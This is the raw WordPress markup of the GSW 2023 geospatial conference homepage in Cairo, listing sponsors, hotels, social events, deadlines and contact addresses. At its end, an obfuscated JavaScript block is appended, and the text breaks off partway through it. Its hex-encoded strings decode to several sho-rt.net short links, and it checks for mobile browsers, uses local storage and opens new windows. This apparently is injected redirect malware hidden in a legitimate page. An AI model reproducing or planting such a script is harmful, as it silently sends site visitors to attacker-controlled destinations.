center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570590746{margin-top: 135px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\